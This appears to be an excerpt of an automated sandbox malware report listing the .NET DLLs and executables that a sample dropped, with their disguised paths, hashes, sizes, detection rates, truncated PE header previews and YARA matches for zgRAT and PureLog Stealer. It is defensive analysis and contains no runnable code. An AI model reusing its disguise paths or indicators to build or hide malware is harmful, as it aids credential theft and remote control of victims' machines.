                                                                                                                                  Size (bytes):70144
                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34304
                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34816
                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):40448
                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):294912
                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):40448
                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46592
                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33792
                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):38400
                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):32256
                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36352
                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):342528
                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):38400
                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70144
                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  File Type:MSVC .res
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1224
                                                                                                                                  Entropy (8bit):4.435108676655666
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4608
                                                                                                                                  Entropy (8bit):3.940110575590287
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:6vJvPtPuM7Jt8Bs3FJsdcV4MKe2777TvqBHiOulajfqXSfbNtm:aPFPc+Vx9MDvkMcjRzNt
                                                                                                                                  MD5:78BBEDFB4F144CFCAC0AC8E5C9473BF3
                                                                                                                                  SHA1:44CA97B614917DAD3F799612E6A0B3FDCD31F4C8
                                                                                                                                  SHA-256:C5C2BFC98A08F9559A8EA388B56655FD909C69629983014F83B80E61AC5F1A9C
                                                                                                                                  SHA-512:EDFF9C7AA8848BCEDC4FF83D77226EA9CE0D8447A013F42756A5982A5BF63D1AF93D483E3EEC1C40773D1E94D4C1049E3E4E037EA0A754376688DE879A4360DA
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Sxg.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                  Process:C:\Users\user\Desktop\kJrNOFEGbQ.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3680256
                                                                                                                                  Entropy (8bit):7.823453943837237
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
                                                                                                                                  MD5:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  SHA1:77C3F5F6B13A267C76D5D716FC568F243C5606EE
                                                                                                                                  SHA-256:FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                                                                                                                  SHA-512:0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N...*.......8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...
                                                                                                                                  Process:C:\Users\user\Desktop\kJrNOFEGbQ.exe
